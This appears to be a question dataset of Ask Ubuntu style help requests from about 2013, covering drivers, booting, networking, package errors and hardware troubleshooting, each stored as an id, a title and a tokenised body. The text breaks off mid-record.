355763	i want to run .jre apps on my ubuntu 12.04	i have installed jre and also jdk.i want to run some appliction in .jre format . ( i think they are java apps ) . but i do not know how to run those in my ubuntu 12.04 .please someone may help me ...
355768	ati drivers cause screen update problems with tear free turned on	i wish to install ubuntu 12.04 on a htpc that i 've built . i have the exact same configuration for my workstation where i use fedora 19 . it 's an amd apu a10 6800k system . the problem is when using the proprietary drivers things like scrolling and video playback are crappy , there is tearing and it 's just not smooth . all this goes away when `` tear free '' is turned on . however with it turned on i get serious screen update issues . specially in the terminal , the text i type appears a fraction of a second later , scrolling in firefox works smoothly but after i stop scrolling it jumps a few pixels . this problem is sporadic and does n't happen all the time . but every time i start to think `` oh it 's gone '' , it happens again . the latest r600 drivers do n't have this problem . i have tested ubuntu 13.10 and fedora 19 both running the latest open source driver , do n't seem to have this issue . anyone know a fix to this ? i know you can update mesa packages of 12.04.3 to mesa 9.2 but i do n't want to mess up my system with crappy ppas . also i 'm guessing 12.04.4 will have 9.2 anyways . if anyone knows how to fix this ?
355769	what is an affordable three monitor gpu which is compatible with ubuntu ?	i painfully found out that i ca n't run a three monitor setup in ubuntu with my cheap dual amd hd 5450 cards . it 's also having a hard time with two monitors with random flickering pixels . i 'm not going to waste more time troubleshooting it . so basically i need a good graphics card that can support 2x 1920x1080 displays and a 2560x1440 display and be compatible with ubuntu . i do n't do gaming , so i just need one that works and can handle virtual machines without trouble . i 've heard amd eyefinity cards are supported , but which cards specifically ? do you successfully run three monitors on ubuntu with the resolutions of my displays ? which card do you use ?
355770	installation problem through window 7 and not working with window 7	i hav asus eee pc 1225c n2800 atom processor and want to install ubuntu version on winodws 7 i hav trouble in there installation and not work in grub and not work in graphic mode and not workd in ahci or achi mode please help me
355772	i am using ubuntu 13.04 not able to install airtel 4g lte dongle	i have recently installed ubuntu 13.04 in my pc . everything works fine except my airtel 4g lte dongle ( model mf825a ) . ubuntu does not give any option to select 4g lte when setting up a mobile broadband connection . how can airtel 4g lte ( model mf825a ) dongle be used with ubuntu ? are there any patches or other updates available for getting this problem solved ?
355773	problem with virtualbox	i have ubuntu 13.10 and i installed virtualbox 4.2.16 on ubuntu and i want to create a virtual disk but when i create a virtual disk by click on start button , the error message appears kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . dkms is installed and kernel headers version is 3.11.2-031102-generic thanks in advance
355774	where should i install my tar.gz files like java or eclipse ?	i am quite new to ubuntu and i see there are many folders in the root directory ( /etc , /usr , /opt etc. ) . i would like to know if there is a standard folder where i should install java , eclipse and any other tar.gz files that are intended for unpacking and then compiling generally ?
355775	opt/lampp/htdocs cant be accessed	first , im new on ubuntu so please bear with me . im using ubuntu 13.04 and i just installed lampp . now i want to copy a file to opt/lampp/htdocs . i also cant create new folder and documents in this location . when i see the properties of a file , it said `` you are not the owner , bla bla '' , and i cant edit the `` access '' drop down list . what is going on ? what should i do ? thanks for your time : d
355776	driver for acer aspire revo r3600	i have this machine with intel atom cpu 230 @ 1.6ghz , 1g ram , 120g hdd . i would like to stick to a more standard ubuntu ( v 12.04 lts 32 bit ) . does any one know if it has all the drivers my machine needs ? if not , where and how can i get the rest ? i heard that there may be an issue of having the graphic card driver . can someone help ?
355778	any message concurrency framework for c language in ubuntu	are there any message concurrency framework for c language ? like https : //code.google.com/p/retlang/
355779	will ubuntu 13.04 remove windows ?	on download menu it says download ubuntu desktop and replace your current operating system whether itâs windows or mac os or run ubuntu alongside it . so i was wondering if it means that ubuntu will remove windows ( meaning i will not have access to it `` anymore '' ) or it wo n't and it will be used as `` option '' choices when powering on pc ?
355781	problem with xps attachment	i received a mail with attachment in xps which could not be opened . whenever tried it says acchieve does not support . please guide me how i can view the attachment .
355786	ubuntu server 12.04 wo n't boot . software raid 1	i need to fix this issue i have in one of our machines . motherboard is asus z9pe-d16 . we have 4 sata drives enabled and one of them has failed . it 's the drive in port 1 . so the system is not booting into the os ( ubuntu server 12.04 lts ) i boot from the installation image , and this is whats detected in the first stage and then in the partitionning section what i would like to do is first boot from the mirror disk ( i thought this was automatic ) and then rebuild the raid replacing the broken drive with a new one how can i do this ? thanks guys !
355787	ubuntu do n't remember my brightness settings	i installed ubuntu 13.04 . i notice that when i lower the brightness there is a lowest brightness point and when i lower further than that the brightness will increase . and why every time i restart the computer the brightness value goes to default .
355789	adding custom system calls to recent linux kernel versions ?	what is the procedure to add custom system call to linux versions 3.5 and later ? i came to know that the procedure has changed from linux-3.5 onwards . can anyone provide me a link to any tutorial or explain it themselves ?
355790	how to use iio on surface pro to access sensor data in ubuntu 13.04	i have ubuntu 13.04 running on a surface pro . one of the usb device ( id 045e:0794 ) has registered a number of hid sensor devices : hid-sensor-200041.0 : light : ambient light hid-sensor-200062.0 : mechanical : boolean switch array hid-sensor-200073.0 : motion : accelerometer 3d hid-sensor-200076.0 : motion : gyrometer 3d hid-sensor-200083.0 : orientation : compass 3d hid-sensor-200086.0 : orientation : inclinometer 3d hid-sensor-20008a.0 : orientation : device orientation when loading hid-sensor-als a iio device is available in /sys/bus/iio/devices/iio : device0 and also /dev/iio : device0 is created . new iio devices are also created when loading hid-sensor-accel-3d and hid-sensor-gyro-3d . now my question is how can i get and read out data from these sensors ?
355795	how do i partition a hard drive when ubuntu is already installed ?	i installed ubuntu on my laptop , and now i want to partition my hard drive , but i 'm not sure how to partition after ubuntu is already installed . how can i partition my hard drive ?
355797	unable to change ownership of files	i am working out on an answer as given here http : //superuser.com/a/623998/63915 i copied the windowsios to a usb drive mount -t o loop win.iso /media/usb but i see permissions problem all the files are owned by root : root and when i try to do do sudo chown -r user : user /media/usb/ there is no change in permissions in files of usb i see following ls -l total 3250 -rwxrwxrwx 1 root root 110 oct 9 17:11 autorun.inf drwxrwxrwx 1 root root 0 oct 9 17:11 docs drwxrwxrwx 1 root root 40960 oct 9 17:35 grub -rwxrwxrwx 1 root root 313 oct 9 17:25 grub.cfg drwxrwxrwx 1 root root 1208320 oct 9 17:13 i386 -rwxrwxrwx 1 root root 45124 oct 9 17:14 ntdetect.com -rwxrwxrwx 1 root root 3204 oct 9 17:13 readme.htm -rwxrwxrwx 1 root root 260288 oct 9 17:14 rufusldr -rwxrwxrwx 1 root root 1310720 oct 9 17:13 setup.exe drwxrwxrwx 1 root root 0 oct 9 17:13 support -rwxrwxrwx 1 root root 449797 oct 9 17:16 txtsetup.sif drwxrwxrwx 1 root root 0 oct 9 17:13 valueadd -rwxrwxrwx 1 root root 10 oct 9 17:13 win51 -rwxrwxrwx 1 root root 10 oct 9 17:13 win51ip what went wrong here ?
355799	how to revert changes made by *.deb	i installed a *.deb on my ubuntu 13.04 that was probably badly maintained ( more of that later ) . i downloaded it from a download-portal ( it was gimpshop_26953.deb from netzwelt.de ) and installed via ubuntu software center . the software center claimed that the package was of bad quality because the maintainer-mail-adress was missing . i installed anyway ( probably a bad idea , lesson learned ) . anyway : how can i get rid of what i installed ? it does not show as installed in ubuntu software center , neither can i manage to find anything that makes sense with aptitude ( searching for 'gimp ' ) . software center told me after the successful installation that `` the following applications are run from terminal : gimp , gimp-2.2 , gimp-remote , gimp-2.2-remote , gimptools '' . running 'gimp ' from terminal resulted in starting vanilla gimp 2.2 ( which was not the point in installing gimpshop at all ) . so i now just want to get rid of it and install 2.8 straight away . problem : it does not start . no error given . i think the old installation is still messing around . please please advise how to learn what this pesky *.deb installed and how to uninstall it . i can provide you with the *.deb/link if needed .
355804	my terminal does n't work . how can i fix it ?	when i open terminal , the start text like : maryam @ laptop : $ does n't appear in the first line of terminal . also any command like cd or ls does n't work . i ca n't do anything in my terminal . how can i fix it ?
355805	usb device not removable	i 'm facing a problem regarding my usb flash device . somehow , my usb flash device is not recognized as a removable device , it 's now a partition of a hard disk drive device now . even though i go to a different system it 's not recognizable at all .
355806	pointing to the latest php version on ubuntu terminal	i am new to ubuntu . just installed lampserver using : sudo tasksel install lamp-server problem is that the output of $ php -v is still 5.3 , expecting to see 5.5 and when i run $ sudo apt-get install lamp-server^ it lists all the individual packages as `` * is already the newest version . '' help me point to the right version and know how to run it . thanks !
355808	which ubuntu realese should i pick ?	i have a relatively old pc ( 5 years old ) running on vista . i got fed-up with vista and i am not quite convinced with windows 8 . i seriously considering to switch to ubuntu . being quite new to the linux/ubuntu world i am not sure which is the best release for me . shall i go to the latest release ( the 13.10 ) ? or shall i go for the latest lts ( the 12.04 ) release or something in between ? is it painful later on to upgrade your ubuntu system ? please let me know your recommendations . from system requirements there should be no problem . my pc seems to have the suggested requirements for all the latest releases . thanks for your help .
355810	puppetlabs apt sources lead to unauthenticated packages error	i have just created a new vm from hetzner with ubuntu 12.04 and started setting it up . the steps i did are basically wget http : //apt.puppetlabs.com/puppetlabs-release-precise.deb sudo dpkg -i puppetlabs-release-precise.deb sudo apt-get update & & sudo apt-get -y install git puppet this causes an error : warning : the following packages can not be authenticated ! augeas-lenses debconf-utils ruby virt-what liberror-perl git-man git libaugeas0 libaugeas-ruby1.8 libaugeas-ruby ruby-json libjson-ruby libruby libshadow-ruby1.8 patch i am at a loss how to approach this problem . i have just created a local vm with ubuntu 12.04.3 and it worked flawlessly . a few of the things i have tried from browsing : sudo apt-get remove debian-keyring debian-archive-keyring sudo apt-get clean sudo apt-get update sudo apt-get -y install debian-keyring debian-archive-keyring and sudo apt-key update sudo apt-get update did not help . any ideas where to look for the problem ?
355818	ubuntu boot problems after first installation	i just installed ubuntu and i have problems . i did everything that tutorial said so , but when installation finished , i restarted and i chose ubuntu as boot but when i booted , black screen showed and then purple screen of ubuntu showed with no letters on it and i stucked to it . whats the problem ?
355823	sending file using sendmail	i have a shell script that uses sendmail function to send email the code is as follows mailalert ( ) { sendmail -f sender-name -it < < end_message to : recipient @ example.com subject : subject message end_message } it gets executed whenever i call this function . now i have a text file which i want to send using sendmail as attachment or as message in the email it sends . how can i do that ? i have tried alot of tricks but nothing seems to work . please help .
355824	installing ubuntu ( 13.10 ) on external usb hard drive	i know this question sort of has been answered elsewhere , notably , here : install ubuntu to boot from partition on external hard drive except that i am having an error that i do not know what to do with . i am getting a `` failed to unmount partitions '' on `` /cdrom '' right after partitioning the usb hard drive . i 've googled this error without finding an accurate match , i have found errors related to cd-rom on server editions of ubuntu except that the fix does n't apply to me ( no files to rename and path is different ) i have to admit i am not savvy enough with ubuntu to know how to troubleshoot this error .
355825	right distro for game emulation/media playback ? older hardware	i have an old dell dimension 8250 desktop ( 2002 , made for xp home sp2 ) im trying to put to use . my plan is to strip it down , and use it to store files i want long term ( movies , music and docs ) and also have it be a light web browsing/gaming machine ( some emus like epsxe , project64 , snes/nes , with an xbox 360 controller plugged in with chrome or firefox ) i have 512mb ram , a nvidia video card , if anything else is important i can get the info . got the discs from dell and clean installed xp home but once i got it up to sp3 it really crawls . ubuntu 12.04 didnt run super well ( mainly menu issues like icons only showing once i scrolled over them ) but was reasonably quick to open apps where the xp install would take minutes for certain programs to open ( chrome would take 2 minutes or so to open then load the url ) . gon na do a once over with spybot/malwarebytes/ccleaner/decrapifier to scrub out the gunk and double driver back up to save time after os reinstall . so based on what ive read , lubuntu seems to be the `` lightning bolt to dr frankensteins monster '' when it comes to ancient machines like mine . but will it do what i want it to , and will it be actually playable ? how about legacy apps like morrowind or diablo 2 ? will my android device work with it ( ie do i need to configure anything or just plug and play ? samsung gs3 ) ? i also have a legit copy of windows 7 pro laying around . would that be a better os for this than xp or a linux distro ? secondary issue : while installing ubuntu i partitioned the drive ( 120*gb ) to a 60/60gig split to dual boot incase i needed the xp side . now i cant figure out how to get that 60 gigs back onto the one directory . closest ive come is setting what was the ubuntu side as z : \ drive and formatting it to nfts . it works but would rather it be back as a part of c : . any help apprciated !
355826	mounting network files	i am using ubuntu 12.04 lts and a nas ( qnap ts-219p+ ) ( ip adress : 192.168.0.111 ) on which samba is running . i wanted to mount some files of the nas using mounting points in /media . so i created for each nas file a corresponding file in /media for example connecting nas/transfer to /media transfer using chown and chmod . in fstab i added the necessary line , for example : //192.168.0.111/transfer /media/transfer cifs user=juergen , passwd=1234 0 0 and so on in nautilus the nas file is initially shown as mounted in 'ger채te ' ( german ) . in english i think it would be 'devices ' . after a short while the mounted file appears in 'rechner ' ( in german language ) . in english i think it should be 'computer ' . i can access the nas files . but i am not able to change the owner and the user of for example /media/transfer from root root to juergen juergen . using the command sudo chown -c juergen /media/transfer in the terminal line it is said that root root has changed to juergen juergen but using the command ls -l again root is shown as the owner . comment : i am using ubuntu only for some months .
355832	configure firewall to use ssh tunnel through port 80	i am having some issues configuring iptables to use ssh tunneling through port 80 . here are my iptables rules . : input drop : forward drop : output drop -a input -m state -- state related , established -j accept -a input -i lo -j accept -a input -p tcp -m tcp -- dport 80 -m state -- state new , established -j accept -a output -m state -- state related , established -j accept -a output -o lo -j accept -a output -p tcp -m tcp -- sport 80 -m state -- state established -j accept when i have output set to drop , ssh works fine but i can not use the ssh tunnel to recieve internet . it works fine when output is set to accept though . i have port 80 open in input and output so im not sure why i am having this issue . i am using the ssh tunnel as a proxy through firefox and i get this error the connection was reset the connection to the server was reset while the page was loading -the site could be temporarily unavailable or too busy . try again in a few moments -if you are unable to load any pages , check your computer 's network connection . -if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web .
355833	what does `` output has been suspended by pressing ctrl+s '' mean ?	i have encountered this for the first time in ubuntu 13.10 . what is the meaning of this message across the top of the terminal ? is it a warning or a suggestion ? unless i press ctrl+q , it does n't give me a prompt to enter .
355837	what to do with executablepath/usr/lib/nux/unity_support_test ?	everytime i boot up my 12.04 it warns me about this error , and clicking details says : executablepath/usr/lib/nux/unity_support_test is there anything i can do except keep clicking `` do n't bother reporting '' ? please tell me in layman 's terms : like , do n't tell me to use synaptic , tell me where it 's hidden in 12.04 ?
355839	use my inputs like input	hi i 'm new in ubuntu but i had a problem i have one audio output and two audio inputs on my computer . but , i have one microphone , stereo reproductors and headphones . in windows realtek driver , i could simple change the audio input to output , now i 'm using ubuntu . is there any option to change the input to output and conversely ? thanks
355845	puppet schedule , install , move	i installed puppet master and server in different vms . now i need to deploy one application through puppet master to puppet agent using dashboard or back-end process . how do i configure that ? puppet agent automatically pulls the configuration every 30 minutes , but when there is any new change in puppet master , puppet agent should get the notification . how do i configure that ? how do i move a file through puppet master to puppet agent ?
355847	maas dhcp can not be detected at node installation	i am installing a maas ubuntu 12.04 by iso with virtualbox as the host machine . i have a problem on the cluster management during the process of adding the node . the node can not detect the dhcp configuration from the maas host machine during installation . i have even started off the managed dhcp & dns at the host maas webui to the interface pointing to the node vm . i am not sure if i need to install dhcpd , as the maas already provides maas-dhcp and maas-dns . how can i check to see if maas-dhcp and mass-dns is working correctly ?
355848	how do i reset to the default file manager for all folders ?	i keep getting the failed to execute default file manager for when i try to open files from firefox . the other error i get is i ca n't use any shortcuts to get to folders from the panels . i only can use the desktop to get to any folder . any ideas on how to fix this ? i figured i could reset the file manager . can this be done ? if so , how ?
355849	no install option , only source code	i am using ubuntu 13.04 . trying to install new software but i see only use the source code in ubuntu software center . there is no install option . and i am trying to install few plugins for browser its not working . i tried using wifi as well as wired connection . tried following things after reading same kind of problems on net- 1. sudo rm /var/lib/apt/lists/lock sudo rm /var/cache/apt/archives/lock 2. system- > administration- > software sources could not find this path . 3. sudo apt-get update then again tried none of these helped me . any suggestion would be very thankful .
355850	how to partition for a dual boot	i 'm planning to fresh install ubuntu with windows 7 running beside it . could anyone give me tips on how to do this and which to do first ? also how exactly to partition .
355851	i can not install anything	i can access internet trough mozilla , but when i try to install any program ( samba ) on ubuntu software center , or even on console , i get an error of internet connection .
355859	how can i set different key bindings for the launcher and the dash ?	i would like to have separate keys shortcuts for the dash and the launcher instead of using the same key ( tap or hold ) . how can this be accomplished ?
355860	how do i remove the annoying authenticator ( terminal ) ?	i finally managed to reach to ubuntu after many unfair-unsolved errors and boot errors as well.. now another unfair issue detected . i made an user account with password , great , i downloaded steam , i double click it , authenicator shows up but when i type something , it doesnt show on authenticator ! ! ! it wants a password for the user name account i use to let steam download packages , but when i type anything , it does not show on authenticator ! it does do nothing but to say error that i typed nothing . i even deleted password of my username account and it still shows up . what the h ! ! ! is this problem ? its even annoying than justin bieber ! ! authenticator is my next nightmare ... how do i solve it ?
355861	where can i get a live 13.04 image from	i am installing ubuntu linux on my dads computer . i need a live disk image file for 13.04. i all ready have 10.04 installed , but i would like to be rid of that and have a boot able disk for 13.04. where can i get one ?
355862	hostapd failed to update rate sets in kernel module	i 'm getting this error launching hostapd with minimal conf failed to update rate sets in kernel module i 've just installed ubuntu-gnome 13.04 . when i was using ubuntu 12.04 did not receive this kind of error , so i assume is not hardware problem . do i need to add extra wifi drivers ? how to ? kernel info : linux 3.8.0-31-generic # 46-ubuntu smp tue sep 10 19:56:49 utc 2013 i686 athlon i686 gnu/linux pc : aspire one 722
355864	delete fotos or albums	i recently discovered ubuntu one photos . but i do n't like how many photos were uploaded without me knowing . there are for instance a bunch of junk albums on there with junk folders . how can i remove these photo albums from ubuntu one ?
355867	change the color of the text that appears at the beginning of startup	i would like to know how to make the `` ok '' in `` [ ok ] '' green , like there is displayed at the startup of opensuse : starting xxxxxxxxxx [ ok ] < - green color starting xxxxxxxxxx [ ok ] < - green color starting xxxxxxxxxx [ ok ] < - green color starting xxxxxxxxxx [ ok ] < - green color starting xxxxxxxxxx [ ok ] < - green color starting xxxxxxxxxx [ ok ] < - green color at the beginning of startup in ubuntu the [ ok ] is white and not green . does anyone have any ideas ? i have tried modifying /lib/lsb/init-functions and /etc/lsb-base-logging.sh , and it does n't work after i made some changes .
355870	ubuntu 64 bit 12.04 lts kernel version 3.2.0-44 install	because of software support issues , i need to download and install ubuntu 64 bit 12.04 lts kernel version 3.2.0-44 . i 'm an old unix guy ( sun , hp , etc ) who is new to the linux world so be gentle .
355871	getting error when instaling adobe media server 5.0.3 on ubuntu 13.04	i am getting following error when running following script . sudo bash ./installams ./installams : line 289 : ./amsini : permission denied error : the older linux version debian is detected and not supported by the adobe media server installer . please upgrade os to the latest version . please help
355872	pc grub error ubuntu	i dual booted my pc . ( windows 7 64 bit & ubuntu 12.4 lts ) .by mistake i deleted the ubuntu partition while been on windows 7 os . now my pc wont boot .when i switch on pc it says error : no such partition . grub rescue >
355874	unmet dependencies using aptitude to install bind9	i am getting error while trying to install bind9 on ubuntu 12.04 i did sudo aptitude install bind9 the following new packages will be installed : bind9 { b } 0 packages upgraded , 1 newly installed , 0 to remove and 1 not upgraded . need to get 336 kb of archives . after unpacking 962 kb will be used . the following packages have unmet dependencies : bind9 : depends : libbind9-80 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed . depends : libdns81 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed . depends : libisc83 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed . depends : libisccc80 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed . depends : libisccfg82 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed . depends : liblwres80 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed . depends : bind9utils ( = 1:9.8.1.dfsg.p1-4 ) but it is not going to be installed . internal error : the solver install ( avahi-daemon : i386 0.6.30-5ubuntu2 < libnss-mdns : amd64 0.10-3.2 - > { avahi-daemon : amd64 0.6.30-5ubuntu2 avahi-daemon : i386 0.6.30-5ubuntu2 } > ) of a supposedly unresolved dependency is already installed in step 21 internal error : the solver install ( lsb-base : amd64 4.0-0ubuntu20 < avahi-daemon : i386 0.6.30-5ubuntu2 - > { lsb-base : amd64 4.0-0ubuntu20 lsb-base : amd64 4.0-0ubuntu20.2 } > ) of a supposedly unresolved dependency is already installed in step 37 the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) bind9 [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 1 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . how should i proceed here ? answer to a comment below sudo apt-cache policy bind9 libbind9-80 [ sudo ] password for deel : bind9 : installed : ( none ) candidate : 1:9.8.1.dfsg.p1-4 version table : 1:9.8.1.dfsg.p1-4 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libbind9-80 : installed : 1:9.8.1.dfsg.p1-4ubuntu0.5 candidate : 1:9.8.1.dfsg.p1-4ubuntu0.5 version table : *** 1:9.8.1.dfsg.p1-4ubuntu0.5 0 100 /var/lib/dpkg/status 1:9.8.1.dfsg.p1-4 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages
355878	why is skype is not sending live video ?	i am using lubuntu . when using skype i ca n't send video , but i can receive video . what do i have to do to get this working ? does it need any additional driver software ?
355879	update error in virtual box	when i update my ubuntu , appear w : failed to fetch http : //download.virtualbox.org/virtualbox/debian/dists/lucid/release unable to find expected entry 'non-free/source/sources ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . what can i do for fix this error on my virtual box ?
355880	issues changing lightdm unity-greeter background ubuntu 12.04:	following the guide at : how do i change the wallpaper in lightdm ? i attempted to modify the background for the unity greeter . however , whenever i attempt to turn off dynamic switching : lightdm @ ubuntu-12 : /root $ gsettings set com.canonical.unity-greeter draw-user-backgrounds 'false ' i get a warning : ** ( process:1859 ) : warning ** : the connection is closed the same is true when i attempt to establish a background image , i use the command as described in the before mentioned article and i get a warning . no changes take place . when i do the same as root i do not get any warnings , but no changes take place . i am hiding the user list and showing the manual login box . i do n't know if this has anything to do with the problem , but i thought i would mention it . thanks !
355882	i can not make a backup with backintime in 12.10 and later versions	only in ubuntu 12.04 the backintime works , because the folder .gvfs is under /home/user . in later versions , this folder is relocated so backintime has no access to this folder .
355889	installation failed ! ! says hdd is read only ?	i had an old laptop and wanted to install ubuntu onto it , used my other pc running ubuntu to create a startup usb , booted from usb , chose install to hdd , chose erase erase disk and install ubuntu ( used to have windows vista ) it started installation , got all the way to copying files and then crashed ! said could n't install because the hdd is read only ! so i went into disk utility and formatted the disk and tried again , same thing happened , how do i change the read/write permissions ! ? ! ? ! ?
355891	how do i delete one of two ubuntus on my pc	i 've installed ubuntu 13.04 two times on my pc . each on different partition . i would like to delete the one which i 'm not using . how would i do that ? thank you !
355896	ms word margins offset in cups ?	i have an hp laserjet 4014n hooked up to a cups installation on ubuntu server 12.04 . it 's shared to a number of windows clients . when someone sends a print job , it is held in a queue until a staff member releases it . this is to allow cash sales printing in a library : patrons print , pay at the desk , then the staff release the print job and hand it to the patron . everything works fine , except for ms word 2010 documents , which print out wrong . the content is all there , but the left margin is always about an inch larger than expected , offsetting the whole page to the right . other programs work normally . print jobs sent from notepad print without any offset . ditto for pdf documents . it 's just ms word that 's affected . furthermore , the offset only happens when cups is part of the print procedures . i tried sending a few word print jobs directly to the printer , bypassing the cups part entirely , and they came out without any offset . is there any setting i can adjust , either on the cups end or the windows end , to make it respect the margins in word documents ?
355897	install and configure xhprof	problem i 'm trying to configure and use xhprof . i 've managed to get it installed and running on my server but i get a blank page when i try to access localhost/xhprof_html this is the general post i 've been following : http : //www.grasmash.com/article/installing-xhprof-drupal # view set-up i 'm running a fresh ubuntu server 13.04 . its inside an virtualbox ( server set-up ) i installed xhprof using : sudo pecl install -f xhprof i then added the following lines to my php.ini . extension=xhprof.so xhprof.output_dir= '' /tmp/xhprof '' i then rebooted apache and tested that xhprof is running using php -m. it is . i then moved xhprof_html from /usr/share/php/ to /var/www/ but when i open localhost/xhprof_html/index.php i get a blank white screen . i had something similar when i first installed drupal and the following command fixed it : $ sudo chown -r www-data /var/www/drupal/ however i ca n't it to work this time . what have i done wrong ?
355902	installed windows 8 alongwith existing ubuntu 13.04 ubuntu grub not installing	http : //paste.ubuntu.com/6214502/ i previously had windows 7 and ubuntu 13.04 dual boot ..working perfectly.. then i did a clean installation of windows 8 over my win7 partition..it succeeded . ( by disabling the uefi option in bios ) then i tried boot-repair x64 disk of ubuntu to repair ..but it didnt installed grub .. moreover grub options in the advanced tab ( of the repair disk utility ) are disabled how can i force install grub on sda..or any other way
355904	troubleshooting wireless network connnections	so , thanks to a prior question i asked , i can now see my wireless card on iwconfig and ifconfig . ubuntu server 12.04 i 've set it up with sudo iwconfig wlan0 essid ssid key key with ssid and key properly entered into the command . then , i checked scan to make sure the ( not broadcasting ) network was being detected . it is . then , i disabled eth0 to make sure the network connection was going through the wireless . the server dropped off the network . it was suggested i use dhclient to force an ip onto the device . using it enables eth0 again , and the wlan0 still does n't have an ip associated . how do you figure out why a device is n't connecting to a network ? do i have to broadcast the ssid ? i would really rather not for security reasons .
355907	multiple-monitor display does n't work after update to 13.10	i upgraded from 12.04 to 13.10 , and after that , my secondary monitor does n't work anymore . a little more info : $ xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gf114 [ geforce gtx 560 ti ] ( rev a1 ) $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : gf114 [ geforce gtx 560 ti ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : f4000000-f5ffffff memory : e8000000-efffffff memory : f0000000-f3ffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff even at login screen , it does n't detect it at all . so , anyone knows how to fix this ?
355912	having several sound issues with ubuntu 12.04	i 'm not exactly describing one problem , because i feel like solving it would be useless . in the last 3 months i had a huge amount of problems with my headphone jack / speakers . i am using ubuntu 12.04 on an alienware m17x machine . ever since i installed ubuntu 3 months ago , a new sound problem came up every day , here is a short list : without an headphone jack , speakers work fine , but when i put my headphone jack in , sound still plays through my speakers ; i have to go through pavucontrol to get the sound to go through my headphone jack ( that is actually a very recurrent problem ) sound is very low in the headphone jack ( barely audible if i go in pavucontrol and put the headphone volume at 150 % and the room is quiet ) . sound goes through both speakers and headphone jack when pavucontrol sets the output to headphone jack microphone input is very low ( barely audible as in the previous problem ) but the microphone outputs the same thing as my headphone jack is outputting etc , etc , etc . all these problems have one thing in common which pisses me off a lot : i was using my computer ( i barely ever turn it off ) , all the settings were fine at some point , did n't touch anything , and then bam problem . very frustrating . i believe a cause might be because updates were done silently while i was using my computer but i admit i never actually noticed that the problems arrived right after an update . otherwise i have no idea where these magical problems came from . so here 's the question : why could i possibly get all these sound problems out of nowhere ? i am not even bothering to ask how to fix them , because more often than not these problems were fixed by ... ''dumb fixes '' , i.e . go to some parameter in pavucontrol/alsamixer , switch it on then off ( or the opposite ) ( in other words , doing nothing very special ) and then bam problem fixed . i am sick of these mysteries , as you can see . edit sudo lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise sudo uname -a : linux patrick-m17xr4 3.5.0-41-generic # 64~precise1-ubuntu smp thu sep 12 16:50:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo dpkg -l | grep alsa : ii alsa-base 1.0.25+dfsg-0ubuntu1.1 alsa driver configuration files ii alsa-utils 1.0.25-1ubuntu5.2 utilities for configuring and using alsa ii bluez-alsa 4.98-2ubuntu7 bluetooth alsa support ii bluez-alsa : i386 4.98-2ubuntu7 bluetooth alsa support rc gnome-alsamixer 0.9.7~cvs.20060916.ds.1-3 alsa sound mixer for gnome ii gstreamer0.10-alsa 0.10.36-1ubuntu0.1 gstreamer plugin for alsa the command sudo lspci | grep audio outputted nothing .
355913	ubuntu does n't find usb device	i have an beagle bone black connected via usb after installing some software ssh did n't work any more . somehow the usb device is not recognized any more at all . i did try to connect my samsung galaxy s2 which did also not work . it does charge but i ca n't access any of the contents . i tried lsinput without success . also udevadm monitor -- udev did n't detect anything when i connect the usb cable . any suggestions ? to clearify : a drive was automaticly added ( a ~70 mb drive with some documentations ) . as far as i understand it is the usb connection also a network connection in this case ( or at least should be ) and the bbb a router which broadcast over 192.168.7.3 and is reachable over 192.168.7.2 but the connection can often not be established . somethimes it works but most of the time not . it only shows me network connection terminated all the time and timeout 's on ping as well as ssh . once a ssh connection is established it is fine and the connection does n't die anymore . ifconfig does n't really show something when i have connection problems , when everything works it show 's an eth1 connection . sudo fdisk -l : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 köpfe , 63 sektoren/spur , 30401 zylinder , zusammen 488397168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x0004b1bb gerät boot . anfang ende blöcke id system /dev/sda1 * 2048 484239359 242118656 83 linux /dev/sda2 484241406 488396799 2077697 5 erweiterte /dev/sda5 484241408 488396799 2077696 82 linux swap / solaris platte /dev/sdb : 73 mbyte , 73995264 byte 3 köpfe , 48 sektoren/spur , 1003 zylinder , zusammen 144522 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x00000000 gerät boot . anfang ende blöcke id system sudo lsusb : bus 002 device 005 : id 